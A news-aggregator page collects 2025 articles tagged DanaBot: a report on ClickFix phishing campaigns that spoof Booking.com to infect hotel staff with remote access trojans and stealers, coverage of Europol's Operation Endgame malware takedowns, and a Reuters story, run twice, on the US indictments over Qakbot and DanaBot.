Latest news with #DanaBot
Techday NZ
09-06-2025
- Business
- Techday NZ
ClickFix phishing surge spoofs Booking.com to target hotels
Research from Cofense Intelligence has identified a series of phishing campaigns targeting hotel chains in the accommodation and food services sector. These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware. ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site. Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware. This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns. The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively. The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links. Some emails specify that the link will only function on Windows, and the recipients who access the site on other operating systems receive a message indicating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications, which, once executed, can install RATs or steal data from victim devices. ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful. In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.
Forbes
23-05-2025
- Business
- Forbes
Ransomware Kill Chain Whacked As FBI, Secret Service, Europol Attack
Operation Endgame strikes the ransomware access brokers. The ransomware threat suffered a serious, if not fatal, injury this week as multiple law enforcement actions took aim at the global criminal enterprise. Microsoft led the way in taking down large parts of the infrastructure behind the Lumma Stealer network behind the capture and sharing of compromised credentials. This comes after one leading ransomware group, LockBit, was itself hacked. Now Europol, with help from both the Federal Bureau of Investigation and the U.S. Secret Service, has hit at the very heart of the ransomware kill chain by targeting initial access operators. Here's everything you need to know about the latest Operation Endgame success. 'Cybercriminals around the world have suffered a major disruption,' Europol stated after confirming the latest stage of Operation Endgame, which has significantly impacted the ability of ransomware groups, or more accurately, their affiliates, to execute their malicious attacks. By dismantling the infrastructure used by seven of the leading initial access malware operators, Operation Endgame hopes to strike a blow against the tools that are used to launch most ransomware attacks. Working alongside the FBI, Secret Service and the Department of Justice in the U.S., as well as other global law enforcement agencies, Europol said in a May 23 statement that it had taken down 300 servers, negated 650 domains and issued international arrest warrants against 20 cybercriminals. Initial access malware is used to do what it says on the tin: gain initial access to systems and networks in order for ransomware affiliates to be able to then compromise the target and infect it with the ransomware malware itself. While there is a booming industry of initial access brokers, who sell ready-made packages to such affiliates, the availability of such software on a cybercrime-as-a-service basis has seen many bypass the broker and save a bit of money by doing it themselves. Operation Endgame targeted seven of these initial access malware operations, namely: 'By disabling these entry points,' Europol said, 'investigators have struck at the very start of the cyberattack chain, damaging the entire cybercrime-as-a-service ecosystem.' All seven of the malware operations were successfully neutralised by the strikes. Selena Larson, a staff threat researcher at Proofpoint, which was also involved in the actions, told me that 'the disruption of DanaBot, as part of the ongoing Operation Endgame effort, is a fantastic win for defenders, and will have an impact on the cybercriminal threat landscape.' Not least, it will likely cause a rethink in tactics by imposing a cost on them in terms of legal jeopardy. 'After last year's Operation Endgame disruption,' Larson concluded, 'the initial access malware associated with the disruption, as well as actors who used the malware, largely disappeared from the email threat landscape.' Let's hope the same happens now and the ransomware threatscape shrinks as a result.
DW
23-05-2025
- DW
Global operation takes down 'dangerous' malware network – DW – 05/23/2025
In a global anti-malware crackdown, authorities from several countries took down more than 300 servers and issued international arrest warrants for 20 suspects. Some of the world's "most dangerous malware" was disrupted this week in a coordinated international operation, which led to the issuance of 20 arrest warrants, the EU anti-crime bodies Europol and Eurojust said Friday. In an operation involving authorities from Canada, Denmark, France, Germany, the Netherlands, Britain, and the United States, more than 300 servers were taken down, 650 domains were neutralized, and €3.5 million (about $3.9 million) in cryptocurrency was seized. Between Monday and Thursday, the operation enabled the countries involved "to take action against the world's most dangerous malware variants and the perpetrators behind them", said Eurojust, the EU Agency for Criminal Justice Cooperation. "Thirty-seven suspects were identified and international arrest warrants were obtained against 20 individuals criminally charged," it added. What malware was targeted? According to Europol and Eurojust, the software taken down, known as "initial access malware", is used "for initial infection, helping cybercriminals to enter victims' systems unnoticed and load more malware onto their devices, such as ransomware." Malware such as Bumblebee, Lactrodectus, Qakbot, DanaBot, HijackLoader, Trickbot, and WarmCookie were targeted by the measures. "As these variants are at the beginning of the cyberattack chain, disrupting them damages the entire 'cybercrime as a service' ecosystem," the authorities said. Hackers exploit old software bug in VMware attack To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video Operation Endgame continues About 50 of the servers neutralized this week were in Germany, the authorities said. "In Germany, investigations focused particularly on suspicions of organised extorsion and membership of a foreign criminal organisation," according to the federal police and the Frankfurt public prosecutor's office in charge of combatting cybercrime. German authorities also obtained international arrest warrants for the 20 people, "most of them Russian nationals", and launched search operations, they added. The crackdown is an extension of Operation Endgame, the largest police operation ever conducted against botnets. A total of €21.2 million was seized during the operation, which began in 2024. Edited by: Saim Dušan Inayatullah
Yahoo
23-05-2025
- Yahoo
US indicts Russian accused of ransomware attacks
By AJ Vicens (Reuters) -The U.S. Department of Justice on Thursday unsealed charges against a Russian national accused of leading the development and deployment of malicious software that infected thousands of computers over more than a decade. Rustam Rafailevich Gallyamov, 48, of Moscow, led a group of cybercriminals who developed and deployed Qakbot, a name for software that could be used to infect computers with additional malware, such as ransomware, as well as to conscript the computer into a botnet - or group of compromised computers and devices controlled remotely - to be used for additional malicious purposes, according to a DOJ statement. Prosecutors also made public a complaint seeking the forfeiture of more than $24 million in cryptocurrency and traditional funds seized over the course of the investigation, the DOJ said. The charges of conspiracy and conspiracy to commit wire fraud come a year and a half after an international law enforcement operation disrupted Qakbot infrastructure. Gallyamov continued cybercriminal activities after the disruption, prosecutors said, as recently as January 2025. Gallyamov did not immediately respond to a request for comment. The DOJ statement did not indicate his whereabouts. Also on Thursday, federal prosecutors in Los Angeles unsealed charges against 16 people accused of developing and deploying the DanaBot malware, which was used to infect more than 300,000 computers worldwide and cause at least $50 million in damage, according to a DOJ statement. The DanaBot charges are part of Operation Endgame, an international law enforcement and private-sector campaign targeting cybercriminal operators and infrastructure around the world. DanaBot emerged in 2018 as malware to steal banking credentials and other information, but evolved to enable wider information stealing and establish access for follow-on activity, according to researchers with Lumen's Black Lotus Labs, who participated in Operation Endgame. DanaBot remained 'highly operational through 2025,' the researchers wrote in a blog post, with roughly 1,000 daily victims across more than 40 countries.
The Star
22-05-2025
- The Star
US indicts Russian accused of ransomware attacks
FILE PHOTO: A hand is seen on a laptop with binary code displayed on the screen in front of a Russian flag in this picture illustration created on August 19, 2022. REUTERS/Dado Ruvic/Illustration/File Photo (Reuters) -The U.S. Department of Justice on Thursday unsealed charges against a Russian national accused of leading the development and deployment of malicious software that infected thousands of computers over more than a decade. Rustam Rafailevich Gallyamov, 48, of Moscow, led a group of cybercriminals who developed and deployed Qakbot, a name for software that could be used to infect computers with additional malware, such as ransomware, as well as to conscript the computer into a botnet - or group of compromised computers and devices controlled remotely - to be used for additional malicious purposes, according to a DOJ statement. Prosecutors also made public a complaint seeking the forfeiture of more than $24 million in cryptocurrency and traditional funds seized over the course of the investigation, the DOJ said. The charges of conspiracy and conspiracy to commit wire fraud come a year and a half after an international law enforcement operation disrupted Qakbot infrastructure. Gallyamov continued cybercriminal activities after the disruption, prosecutors said, as recently as January 2025. Gallyamov did not immediately respond to a request for comment. The DOJ statement did not indicate his whereabouts. Also on Thursday, federal prosecutors in Los Angeles unsealed charges against 16 people accused of developing and deploying the DanaBot malware, which was used to infect more than 300,000 computers worldwide and cause at least $50 million in damage, according to a DOJ statement. The DanaBot charges are part of Operation Endgame, an international law enforcement and private-sector campaign targeting cybercriminal operators and infrastructure around the world. DanaBot emerged in 2018 as malware to steal banking credentials and other information, but evolved to enable wider information stealing and establish access for follow-on activity, according to researchers with Lumen's Black Lotus Labs, who participated in Operation Endgame. DanaBot remained 'highly operational through 2025,' the researchers wrote in a blog post, with roughly 1,000 daily victims across more than 40 countries. (Reporting by AJ Vicens in Detroit; Additional reporting by Anton Zverev in London; Editing by Matthew Lewis)
